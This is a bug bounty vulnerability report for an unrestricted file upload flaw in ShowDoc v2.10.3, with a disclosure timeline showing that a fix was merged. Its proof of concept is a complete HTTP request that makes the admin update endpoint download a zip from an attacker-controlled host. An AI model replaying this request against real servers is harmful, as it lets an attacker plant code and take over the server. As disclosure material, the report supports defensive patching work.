There is a Unrestricted Upload of File vulnerability in ShowDoc v2.10.3 in star7th/showdoc

Valid

Reported on

Mar 20th 2022


Description

There is a Unrestricted Upload of File vulnerability in AdminUpdateController.class.php in ShowDoc v2.10.3

Proof of Concept

POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1
Host: 10.211.55.5
Content-Length: 66
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://10.211.55.5
Referer: http://10.211.55.5/showdoc-2.10.3/web/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=47uvgq7efm1ethua6a8podcse6; think_language=zh-CN; cookie_token=09d404934af99f9a7cafad11e061df0c23fc785a28781b655a152a7b1eb43000
Connection: origin

new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip

Impact

After the attacker login to the admin panel, the vulnerability can be used to obtain server privileges.

We are processing your report and will contact the star7th/showdoc team within 24 hours. 2 months ago
We have contacted a member of the star7th/showdoc team and are waiting to hear back 2 months ago
star7th validated this vulnerability 2 months ago
Xiaoshui has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on bd792a 2 months ago
star7th has been awarded the fix bounty
to join this conversation